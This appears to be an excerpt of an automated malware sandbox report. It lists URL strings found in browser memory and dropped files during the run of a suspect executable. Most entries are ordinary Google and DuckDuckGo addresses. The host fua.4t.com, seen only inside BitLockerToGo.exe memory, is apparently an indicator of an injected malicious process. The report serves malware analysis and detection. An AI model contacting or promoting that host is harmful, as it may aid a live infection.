Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023929836.000051E002878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2021386883.000051E002490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023526862.000051E0027C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2019213351.000051E00221C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2177416179.0000734800040000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000007.00000002.2023526862.000051E0027C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxM&
Source: chrome.exe, 00000007.00000002.2025904875.000051E002BBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000007.00000002.2025904875.000051E002BBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bQ
Source: chrome.exe, 00000007.00000002.2025904875.000051E002BBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chromecache_437.9.dr	String found in binary or memory: https://clients6.google.com
Source: chrome.exe, 00000007.00000002.2023822319.000051E00282C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chromecache_437.9.dr	String found in binary or memory: https://content.googleapis.com
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.000000000516F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2318678012.000000000576D000.00000004.00000020.00020000.00000000.sdmp, qiekno.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.000000000516F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2318678012.000000000576D000.00000004.00000020.00020000.00000000.sdmp, qiekno.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 00000007.00000002.2026214024.000051E002C60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000007.00000002.2022170028.000051E002510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000007.00000002.2022170028.000051E002510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.googl0
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000007.00000003.1981499906.000051E003E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2031470314.000051E003E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1980948573.000051E003E20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026350468.000051E002CB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000007.00000002.2029079643.000051E0032DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027033597.000051E002E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026350468.000051E002CB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
Source: chrome.exe, 00000007.00000003.1981499906.000051E003E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2031470314.000051E003E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1980948573.000051E003E20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/dogl
Source: chrome.exe, 00000007.00000002.2028394858.000051E0030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029448819.000051E0033DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026350468.000051E002CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1980948573.000051E003E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2031432039.000051E003E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000007.00000002.2028394858.000051E0030D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default%
Source: chrome.exe, 00000007.00000003.1980948573.000051E003E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2031432039.000051E003E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
Source: chrome.exe, 00000007.00000003.1981499906.000051E003E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2031470314.000051E003E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1980948573.000051E003E20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/njb
Source: chrome.exe, 00000007.00000002.2028111286.000051E00304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025011095.000051E0029BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000007.00000002.2027033597.000051E002E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025011095.000051E0029BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000007.00000002.2027033597.000051E002E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025011095.000051E0029BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2023043213.000051E0026D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000007.00000002.2029180014.000051E003310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027033597.000051E002E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2030595747.000051E003B40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1978963138.000051E003B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp7
Source: chrome.exe, 00000007.00000002.2030595747.000051E003B40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1978963138.000051E003B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappQ
Source: chrome.exe, 00000007.00000002.2029511531.000051E0034B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027508814.000051E002F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029448819.000051E0033DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000007.00000002.2029448819.000051E0033DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultr
Source: chrome.exe, 00000007.00000002.2027508814.000051E002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultt
Source: chrome.exe, 00000007.00000002.2029318096.000051E003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/ogl
Source: chrome.exe, 00000007.00000002.2023188496.000051E002700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000007.00000002.2029384362.000051E003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000007.00000002.2027033597.000051E002E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000007.00000002.2027033597.000051E002E14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp#
Source: chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000007.00000002.2027238651.000051E002EBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000007.00000002.2029384362.000051E003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/ogl
Source: chrome.exe, 00000007.00000002.2023188496.000051E002700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chromecache_437.9.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000007.00000002.2022170028.000051E002510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000007.00000002.2022170028.000051E002510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000007.00000002.2022170028.000051E002510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000007.00000002.2022170028.000051E002510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000007.00000003.1939500890.000051E0026B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.dr	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000007.00000002.2026845676.000051E002DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000007.00000003.1971948126.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973797443.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1981181567.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026945596.000051E002DF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029580719.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026845676.000051E002DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000007.00000003.1971948126.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973797443.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1981181567.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029580719.000051E00351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
Source: chrome.exe, 00000007.00000003.1971948126.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973797443.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1981181567.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029580719.000051E00351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2dQ
Source: chrome.exe, 00000007.00000002.2026845676.000051E002DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000007.00000002.2026913697.000051E002DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029283647.000051E003340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029079643.000051E0032DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024026471.000051E0028A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026845676.000051E002DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000007.00000002.2026945596.000051E002DF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025527929.000051E002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000007.00000002.2025527929.000051E002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, gl68gd.3.dr, 9rieus.3.dr, Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2317036639.00000000054B8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025283642.000051E002A58000.00000004.00000800.00020000.00000000.sdmp, gl68gd.3.dr, 9rieus.3.dr, Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000007.00000002.2025283642.000051E002A58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab=
Source: chrome.exe, 00000007.00000002.2025527929.000051E002ADC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2317036639.00000000054B8000.00000004.00000020.00020000.00000000.sdmp, gl68gd.3.dr, 9rieus.3.dr, Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BitLockerToGo.exe, 00000003.00000003.1836261581.0000000002A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fua.4t.com
Source: BitLockerToGo.exe, 00000003.00000003.2057000171.0000000002AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fua.4t.com%
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1907283164.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2057000171.0000000002AA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1893504632.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1924972254.0000000002AA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fua.4t.com/
Source: BitLockerToGo.exe, 00000003.00000003.1893504632.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fua.4t.com/.
Source: BitLockerToGo.exe, 00000003.00000003.2057000171.0000000002AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fua.4t.com/E
Source: BitLockerToGo.exe, 00000003.00000003.2057000171.0000000002AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fua.4t.com/R
Source: BitLockerToGo.exe, 00000003.00000003.2057000171.0000000002AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fua.4t.comI
Source: dwpk5JGAxF.exe	String found in binary or memory: https://golang.org/doc/faq#nil_errorQueryPerformanceFrequency
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976197405.00002AA000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935537468.00002AA00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_M1_AllAPIs_GA4Kids_Stable_20230830htt
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-query.fastly-edge.com/htt
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976197405.00002AA000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935537468.00002AA00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1978963138.000051E003B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000007.00000003.1976197405.00002AA000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935537468.00002AA00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: msedge.exe, 0000000B.00000002.2179100145.00007348003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000007.00000002.2023785899.000051E00281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: qiekno.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
